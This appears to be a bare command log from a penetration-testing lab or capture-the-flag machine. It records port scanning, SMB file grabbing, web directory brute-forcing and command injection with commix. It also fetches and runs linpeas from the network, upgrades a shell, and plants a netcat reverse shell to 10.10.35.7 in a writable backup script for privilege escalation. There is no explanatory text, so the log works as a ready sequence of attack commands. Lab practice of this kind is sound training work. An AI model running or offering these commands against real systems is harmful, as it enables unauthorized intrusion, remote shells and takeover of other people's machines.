nmap -sV -sT -O -p 1-65535 $VICTIM
smbclient \\\\$VICTIM\\public
prompt
mget *
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
git clone https://github.com/commixproject/commix.git commix
cd commix/
python commix.py -r ../request.txt
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 82
cd /tmp/
wget http://$KALI:82/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
echo '#!/bin/bash' > /usr/share/backup/backup.sh
echo "/usr/bin/nc 10.10.35.7 1338 -e /bin/bash" >> /usr/share/backup/backup.sh
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
cd /mnt/.../secret/
modinfo venom.ko